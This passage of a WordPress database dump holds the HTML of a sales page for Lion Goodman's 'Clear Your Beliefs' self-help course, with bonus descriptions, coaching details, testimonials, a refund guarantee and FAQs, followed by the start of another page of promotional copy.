Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1939, 2224, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:73245:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n<p><center><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="clear your beliefs" width="1" height="1" class="aligncenter" size-medium wp-image-1475" /></a></p><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" >Register for FREE Ebook</a><br /></center></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" 